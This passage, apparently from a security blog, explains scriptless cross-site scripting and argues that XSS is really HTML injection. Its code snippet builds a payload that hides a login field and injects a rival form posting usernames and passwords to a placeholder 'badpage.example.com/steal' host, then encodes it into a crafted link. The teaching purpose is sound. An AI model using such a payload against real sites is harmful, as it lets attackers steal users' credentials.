The classic attacker’s response to this is to go to http://ha.ckers.org/xss.html for the XSS Cheat Sheet, and pull something interesting from there. Maybe use the list of events, say, to decide that you could set the ‘onfocus’ handler to execute your interesting code.

But no, let’s suppose by some miracle of engineering and voodoo the defender has managed to block all incoming scripts. Even so, we’re still vulnerable to XSS.

What happens if we try this link:


[The “%3d” there is a hex value representing the “=” character so that the query-string parser doesn’t split our attack.]


OK, that’s kind of ugly – but it demonstrates that you can use an XSS vulnerability to inject any HTML – including a new <form> tag, with a different destination – “badpage” in our URL above, but it could be anywhere. And by hiding the attacked input field, we can engineer the user into thinking it’s just a display issue.
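To give a flavour of what such a link might carry, here is a hypothetical reconstruction of a scriptless payload of this shape (it is not the exact URL from my testing, and “badpage.example.com” is a placeholder destination). It closes the real value attribute, hides the original field, and opens a rival form:

```javascript
// Hypothetical reconstruction of a scriptless payload (decoded form).
// "badpage.example.com" is a placeholder, not the original destination.
var injectedHtml =
    '" style="display:none" />' +   // close the value attribute, hide the field
    '</form>' +                     // close the legitimate form
    '<form action="http://badpage.example.com/steal" method="get">' +
    'Username: <input name="username" /><br />' +
    'Password: <input name="password" type="password" /><br />' +
    '<input type="submit" />';

// What the crafted link's username parameter looks like on the wire -
// note every "=" in the payload travels encoded (%3D), so the server's
// query-string parser doesn't split the attack into separate parameters.
var link = 'http://localhost/XSSFile.htm?username=' +
           encodeURIComponent(injectedHtml);
console.log(link);
```

There is no `<script>` tag anywhere in the payload – it is pure HTML injection.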

With some jiggery-pokery, we can get to this:


Looks much better (and with more work, we could get it looking just right):


So, there you have a demonstration of scriptless cross-site scripting. XSS, or HTML Injection, as I’d prefer you think of it, can inject any tag(s) into your page – can essentially rewrite your page without your knowledge. If you want to explain the magnitude of XSS, it is simply this – an attacker has found a way to rewrite your web page, as if he was employed by you.

[Of course, if I hadn’t been trying to demonstrate that XSS is a misnomer, and prove that you can shove any old HTML into it, I would simply have used a piece of script, probably on the onmouseover event, to set the action of the form to post to my bad site. Fewer characters. Doing so is left as an exercise for the reader.]

Side discussion – why does the Javascript version work at all?

It doesn’t work in Internet Explorer, but in other browsers, it seems to work just fine. At first look, this would seem to suggest that “innerHTML” on a <form> tag is allowing the “</form>” in the XSS to escape out from the parent form. I can assure you that’s not the case, because if you could escape out, that would be a security flaw in the browsers’ implementation of innerHTML. So, what’s it doing, and how do you find out?